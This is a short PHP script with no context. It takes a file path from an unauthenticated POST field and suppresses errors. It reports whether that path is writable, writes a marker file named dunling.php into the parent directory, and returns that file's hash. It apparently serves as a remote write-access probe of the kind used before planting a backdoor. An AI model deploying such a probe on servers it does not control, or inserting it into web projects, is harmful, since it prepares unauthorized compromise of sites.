<?php
error_reporting(0);
isset($_POST['file'])?$file = $_POST['file']:$file="config.php";
$is = is_writable($file);
if($is){
    ini_set("date.timezone","PRC");
    file_put_contents("../dunling.php","ok");
    $filemd5 = md5_file("../dunling.php");
    $ok = "ok@@@".$filemd5;
    echo $ok;
}else{
    echo "no";
}
?>